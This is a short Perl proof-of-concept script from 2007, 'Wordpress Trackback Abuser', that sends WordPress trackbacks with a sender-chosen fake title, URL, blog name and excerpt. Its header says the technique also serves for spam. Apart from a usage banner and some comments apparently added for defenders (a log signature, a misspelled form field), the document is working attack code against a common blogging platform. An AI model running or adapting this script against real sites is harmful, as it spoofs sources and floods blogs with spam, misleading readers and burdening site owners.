# This is a simple PoC showing how the trackback feature can be spoofed: the title, URL, blog name and excerpt are all supplied by the sender. The same technique can be used for spam as well.
#example:
#C:\trackback-abuser.pl.pl http://192.168.2.3/apache2-default/wordpress/wp-trackback.php?p=21 Google3 www.google.com Google Google
#
#
# Wordpress Trackback Abuser
#
#by NotSoSecure // www.notsosecure.com
#
# coded by sid //sid@notsosecure.com  // 07.04.2007
#
#
#
#
#---------Success----------------
# Trackback Successfully Posted:--> Well Done











use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
# HTTP client used for the single trackback POST below.
my $browser = LWP::UserAgent->new;

# The PoC's own tag is prepended to the default libwww-perl agent string.
# For defenders this fixed prefix is a ready-made log signature for this
# exact script, although it is trivially changed by whoever runs it.
my $default_agent = $browser->agent;
$browser->agent("Wordpress_Trackback_Abuser_By_Sid" . $default_agent);

# At least three arguments (endpoint, title, URL) are required; otherwise
# print the banner and usage text and stop before any request is made.
if (scalar(@ARGV) < 3) {
    my @usage_lines = (
        " -----------------------------------------------------------------------\n",
        " Wordpress Trackback Abuser\n",
        " by NotSoSecure // www.notsosecure.com \n",
        " coded by sid //sid\@notsosecure.com  // 07.04.2007\n",
        " ------------------------------------------------------------------------\n",
        " Usage:\n",
        " trackback_abuser.pl <host> <fake-title> <fake-url>> <fake-blog_name(optional)> <fake excerpt(optional)>\n",
        "\n",
        " ------------------------------------------------------------------------\n",
    );
    print @usage_lines;
    exit;
}


# Positional arguments, in order:
#   $host      - full trackback endpoint URL (see the example in the header)
#   $title     - title the trackback will display
#   $url       - URL the trackback will claim to originate from
#   $blog_name - blog name to display (optional; undef when omitted)
#   $excerpt   - excerpt to display (optional; undef when omitted)
# Every one of these values is chosen by the sender and none is checked
# here, which is the spoofing point this PoC illustrates.
my ($host, $title, $url, $blog_name, $excerpt) = @ARGV;


# Build the form-encoded POST carrying the trackback fields.
# What this looks like to a receiving server, for log review:
#   - the literal text " HTTP/1.1" is appended to the URL string handed to
#     HTTP::Request, exactly as the original script does;
#   - the values are joined into the body as-is, with no URL-encoding;
#   - the third key is spelled "blog_nmae" in this PoC and is reproduced
#     unchanged, so that is the key a captured request body would show.
my $responde = HTTP::Request->new(POST => "$host HTTP/1.1");
$responde->content_type("application/x-www-form-urlencoded");

my $form_body = join '&',
    "title=" . $title,
    "url=" . $url,
    "blog_nmae=" . $blog_name,
    "excerpt=" . $excerpt;
$responde->content($form_body);

# Send the prepared request and report the outcome. Only the response body
# is inspected; the HTTP status code is never consulted.
my $out = $browser->request($responde);

print "\n\n Wordpress Trackback Abuser\n",
      "\nb y NotSoSecure // www.notsosecure.com \n",
      "\n coded by sid //sid\@notsosecure.com  // 07.04.2007\n\n";

# The body is kept in a package variable, as in the original script.
$out2 = $out->content;
#print $out2;

if ($out2 =~ /<error>0</) {
    # "<error>0<" in the reply is the marker this script treats as success.
    print "\n\n\n---------Success----------------\n Trackback Successfully Posted:-->",
          " Well Done\n\n";
    exit;
}
elsif ($out2 =~ /Duplicate comment detected/) {
    # The script reads this server message as "same title already posted".
    print "\n\n ---------------------Error-----------------\n\n TrackBack Unsuccessful\n",
          "\n\n Title already Exist,\n\n\n Change the title and try again\n\n";
    exit;
}
else {
    # Any other body falls through to the generic failure message.
    print "\n\n ---------------------Error-----------------\n\n TrackBack Unsuccessful\n",
          " Something Wrong Happened.. Check the trackback Url again";
}
